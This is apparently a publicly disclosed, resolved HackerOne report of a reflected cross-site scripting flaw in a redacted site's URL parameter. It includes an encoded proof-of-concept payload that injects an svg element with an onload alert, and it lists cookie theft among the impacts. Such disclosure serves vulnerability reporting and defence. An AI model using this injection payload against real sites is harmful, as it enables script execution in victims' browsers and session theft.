Reflected XSS at https://██████/██████████ via "████████" parameter
Medium
Vulnerability Details
There is Reflected Cross site scripting issue at the following url:
[https://█████/████](https://██████████/██████████)
Proof Of Concept
https://████████/███████?text=&███=%22%3E%3Csvg/onload=alert(1)%3E████
███████
Best Regards
@pelegn
## Impact
Cookies Exfiltration
SOAP Bypass
CORS Bypass
Executing javascript on the victim behalf
## System Host(s)
██████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
Navigate to https://█████████/███?text=&███████=%22%3E%3Csvg/onload=alert(1)%3E██████
## Suggested Mitigation/Remediation Actions
Actions
View on HackerOneReport Stats
- Report ID: 1457413
- State: Closed
- Substate: resolved
- Upvotes: 3